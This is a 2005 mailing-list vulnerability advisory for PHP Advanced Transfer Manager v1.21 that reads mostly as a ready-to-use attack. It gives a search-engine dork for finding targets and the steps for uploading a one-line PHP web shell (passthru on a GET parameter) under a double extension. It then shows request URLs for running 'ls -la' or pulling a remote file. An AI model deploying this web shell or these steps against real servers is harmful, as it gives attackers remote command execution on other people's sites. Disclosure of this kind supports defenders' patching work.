SecurityFocus

PHP Advanced Transfer Manager v1.21 May 06 2005 08:43AM
tjomi4 gmail com

oooo...oooo.oooooooo8.ooooooooooo
.8888o..88.888........88..888..88
.88.888o88..888oooooo.....888
.88...8888.........888....888
o88o....88.o88oooo888....o888o
********************************
**** Network security team *****
********* nst.void.ru **********
********************************
* Title: PHP Advanced Transfer Manager v1.21
* Bug found by: nst
* Date: 06.05.2005
********************************

Owner: phpatm.free.fr
Google: allintitle:PHP Advanced Transfer Manager

Status: Critical

*** File upload.

1. Register :: http://victim/register.php
2. Login :: http://victim/login.php

Create file:
nst.php.ns

<pre>
<?
passthru($_GET['nst']);
?>

Then upload, and go to http://victim/files/nst.php.ns?nst=ls -la

or

<?
passthru($_GET['nst']);
?>

Then upload, and go to http://victim/files/nst.php.ns?nst=http://your/file.txt

[ reply ]